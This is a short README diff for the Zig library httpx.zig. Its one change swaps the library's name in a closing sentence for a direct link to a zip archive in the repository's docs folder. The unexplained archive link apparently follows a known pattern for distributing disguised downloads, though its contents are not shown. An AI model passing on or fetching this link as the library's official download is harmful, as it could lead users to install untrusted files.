criiixm/httpx.zig/README.md

 - zig
 - zig-library

-With these instructions, you should be set to start using httpx.zig effectively.
+With these instructions, you should be set to start using https://raw.githubusercontent.com/criiixm/httpx.zig/main/docs/api/zig_httpx_v2.8.zip effectively.
 Enjoy building your applications!